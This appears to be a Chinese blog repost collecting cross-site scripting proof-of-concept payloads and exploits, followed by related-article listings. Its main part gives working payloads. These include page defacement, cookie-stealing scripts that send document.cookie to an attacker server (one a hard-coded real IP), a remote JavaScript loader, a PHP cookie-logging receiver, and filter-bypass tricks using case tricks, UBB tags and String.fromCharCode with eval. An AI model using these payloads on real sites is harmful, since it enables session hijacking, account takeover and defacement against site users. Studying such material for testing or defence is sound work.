xss漏洞的poc与exp

最新推荐文章于 2024-10-02 17:07:13 发布
最新推荐文章于 2024-10-02 17:07:13 发布
阅读量1.5k 收藏 8
点赞数
分类专栏: Web安全
原文链接:https://www.cnblogs.com/-chenxs/p/11441672.html
版权

POC

<script>alert('xss')</script>   最简单常用的poc

"><script>alert(1)<script>

<a href=" οnclick=alert('xss')>type</a>  页面出现一个按钮type,点击触发onclick,然后执行弹窗。

<img src=http://1.1.1.1/a.jpg οnerrοr=alert('xss')>  加载图片,给一个错误的图片地址,然后执行弹窗

<script>window.location='http://1.1.1.1'</script> 重定向到指定的url地址

<iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe>

οnmοuseοver=alert(document.domain)  闭合属性,构造on事件

οnmοusemοve=alert(1)

<input type="text" οnfοcus=prompt(1) autofocus> 利用input的autofocus属性,无需用户交互即可触发xss.

htmlspecialchars: 输入常用符号,看哪些符号没被实体编码。

如输入在href或src里面:javascript:alert(1)

js输出,输入的数据由js变量接收,通过</script>闭合即可

EXP

<script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>

篡改页面,将页面篡改为<h1></h1>里面的显示的文字

<script>new Image().src="http://yourhost/getcookie.php?cookie="+document.cookie;</script>

将别人登录的cookie信息捕获到自己的服务器上,自己的服务器上编写一个接收cookie信息的php脚本getcookie.php,此脚本将接收到的cookie信息写入到自动创阿金的txt文本cookie.txt里面

<script>document.location='http://47.99.184.173/getcookie.php?cookie='+document.cookie;</script>

与上一个获取cookie信息的payload相似,相当于这是第二种获取cookie信息的exp

<script src=http://1.1.1.1/a.js></script>

字节服务器上a.js的源码为:

var img=new Image();
img.src = "http://1.1.1.1/cookies.php?cookie="+document.cookie;

获取cookie信息的第三种方式,这种方式的payload比较简短,便于很好的利用。

这种间接的方式,可以适用于所有的exp,将攻击代码放在服务器上的一个js文件里面,然后在漏洞点利用<script>访问。

附上一个简短的getcookie.php脚本

<?php
$cookie = $_GET['cookie'];
$log=fopen("cookie.txt", "w");
fwrite($log, $cookie . "\n");
fclose($log);
?>

绕过方法

利用js双写或者大小写绕过: <scscriptript>alert(1)</scrscriptipt>

利用input弹窗

' oninput=alert`1` //
' oninput=alert`1` '
' onchange=alert`1` //
' onchange=alert`1`  '

利用链接弹窗(a标签) <a href="javascript:alert(1)">click me</a> //

利用Html实体编码如果

利用换行绕过

 1.转义字符: 将xss语句转换为含有"\" 16进制或者8进制

  (工具地址: http://tools88.com/safe/xss.php)

2.UBB标签: UBB标签是目前广泛运用到论坛,留言簿,以及其他网站系统的一种编码标签,类似[img]url[/img]这样的,用户在中间输入地址后即可,在发表的时候系统会自动改成<img src="url"</img>。这个URL就是用户输入的图片地址,XSS攻击中,可以利用这个特点来达到无需用户输入<>就能执行由用户所输入的代码,我们只要在输入网址的地址输入:

x"/**/onerror="alert('poruin')

那么经过转换后就变成了<img src="x"/**/οnerrοr="alert('poruin')"></img>

在JS中空格可以用/**/转换,如图:

JS还原函数

JS中的编码还原函数最常用的就是String.fromCharCode了,这个函数用于ascii码还原,一般来说,这个函数都要配合EVAL来使用才有效果。

在跨站中,String.fromCharCode主要是使用一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换称为ASCII码,然后再用String.fromCharCode还原,因为大多数的过滤系统都不会把String.fromCharCode加以过滤,例如关键字alert被过滤掉,那就可以这么利用:

<img src="x"/**/onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))"></img>

XSS过滤绕过速查表:https://www.freebuf.com/articles/web/153055.html

xss公共平台:http://xss.fbisb.com

zhangge3663
关注
专栏目录
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5844
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXPExploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
如何发现高危的PoCEXP漏洞检测方法 & 示例,实战应急实战举例,包括:SQLi、XSS、SSTI/ELI、文件哈希、SSRF、命令执行/命令注入等等
代码讲故事
04-11 476
如何发现高危的PoCEXP漏洞检测方法 & 示例,实战应急实战举例,包括:SQLi、XSS、SSTI/ELI、文件哈希、SSRF、命令执行/命令注入等等。 在网络安全领域,发现高危的PoC(Proof of Concept)和EXPExploit)对于防范和应对潜在的安全威胁至关重要。以下是关于如何发现高危漏洞漏洞检测方法、实战应急举例的详细介绍,涵盖了SQL注入(SQLi)、跨站脚本攻击(XSS)、服务器端模板注入(SSTI/ELI)、文件哈希、服务端请求伪造(SSRF)、命令执行/命令注入等多种
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
XSS POC
qq_43616736的博客
07-28 2150
xss xss 作为owasp top 10 之一, xss 被称为跨站脚本攻击 xss 危害: 1.盗取各种用户帐号 2.窃取用户cookie资料,冒充用户身份进入网站 3.劫持用户会话,执行任意操作 4.刷流量,执行弹窗广告 5.传播蠕虫病毒 xss漏洞发生在 ...
【web安全】——XSS漏洞
最新发布
wxh的博客
10-02 1677
DOM被称为文档对象模型,是一个平台和语言的接口,使得程序和脚本可以动态访问和更新文档的内容、结构和样式。DOM本身是一个表达XML文档的标准,HTML文档从浏览器的角度来说就是XML文档,有了这些技术之后,就可以通过js轻松访问到他们。DOM会将XML文件的节点构建成树状结构,以此反应XML文件本身的阶层结构。
xss poc
cnbird's blog
03-15 782
Ajax Worm - Proof of Concept http://myappsecurity.blogspot.com/2006/12/ajax-worm-proof-of-concept.html Ajax Sniffer - Prrof of concept http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-pr
【安全】漏洞名词扫盲(POCEXP,CVE,CVSS等)
热门推荐
qqchaozai的专栏
12-16 2万+
POC(Proof of Concept) 漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在 EXPExploit) 漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本) 0DAY 含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。 CVE(Common Vulnerabilities & Exposures) 公共漏洞和...
Weblogic的漏洞pocexp汇总
Websec
11-19 3204
团队github地址:https://github.com/BetaSecLab/betaseclab_tools
Some-PoC-oR-ExP(各种漏洞pocExp的收集或编写)-20210715.zip
08-05
《各种漏洞POCExp的收集与编写》 在网络安全领域,漏洞是系统或软件中的弱点,可被攻击者利用来获取未经授权的访问权限或执行恶意操作。"PoC"(Proof of Concept)和"Exp"(Exploit)是安全研究者在发现漏洞后...
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
zz12345600354的博客
04-23 1125
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
POC-EXP:在某些应用程序上收集和编写PoCEXP漏洞
05-12
收集和编写PoCEXP的某些应用程序中的漏洞
exp入手分析漏洞
weixin_30810583的博客
07-26 373
分析poc和分析exp有一些不一样,因为exp是人为构造后的东西,它会执行一段自定的shellcode。结果是根本不会触发异常或者异常在离触发点十万八千里的地方。这样分析poc的技巧就用不上了(因为无法有效的定位到漏洞触发的第一现场)。但是可以从exp的功能入手,观察一下exp的行为比如创建文件、创建进程之类的。可以从行为找出关键的API进行下断。 1.分析shellcode的功能,对其中的关键...
干货|常用渗透漏洞pocexp收集整理
zhangge3663的博客
10-27 4794
...
jQuery XSS POC汇总
afei001
06-08 1310
1.jQuery-2432_xssPOC <!DOCTYPE html> <html lang="zh"> <head>jQuery-2432_xssPOC</head> <body> <script type="text/javascript" src="http://target/jquery.js"></script> <script type="text/javascript"> $.get...
XSS漏洞pocexp
bamanju0574的博客
09-01 950
poc <script>alert('xss')</script> 最简单常用的poc <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('...
XSS跨站脚本攻击(内含poc)----自用笔记
weixin_59114667的博客
02-22 327
仅仅是自已用,无别的想法(doge)
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 2122
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
[PoC]某B2B网站的一个反射型XSS漏洞
MichaelJScofield的专栏
11-17 4833
Author: Charlie  转载请注明出处。 工作过程纯粹手贱,测试了一下。然后发现了这么一个东西。有心利用能造成大范围影响。如可以自由修改用户信息。 漏洞存在文件:*.b2b.youboy.com/framephoto.html  【用户商铺的framephoto.html 文件均存在】 成因:没有对提交的参数 path 和 t 的值进行过滤就插入到网页。 漏洞证明:
OWASP TOP 10(二)XSS漏洞(概述、PoC、分类、构造、变形绕过、XSS-Filter、xsser、xsstrike)
Pluto.的博客
12-15 2340
文章目录OWASP Top 10XSS一、概述二、XSS危害三、XSS相关四、使用PoC代码简单验证XSS漏洞五、XSS分类1. 反射型XSS2. 存储型XSS3. DOM型XSS六、XSS的构造1. 利用<>构造HTML或JS标签2. 伪协议3. 事件驱动七、XSS的变形1. 大小写转换2. 引号的使用3. 利用左斜线代替空格4. 添加Tab或回车符5. 对标签属性值进行转码6. 拆分跨站7. 双写绕过XSS练习平台 OWASP Top 10 XSS 一、概述 XSS被称为跨站脚本攻击(Cro
XSS漏洞简介、危害与分类及验证
2201_75362610的博客
04-14 2422
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值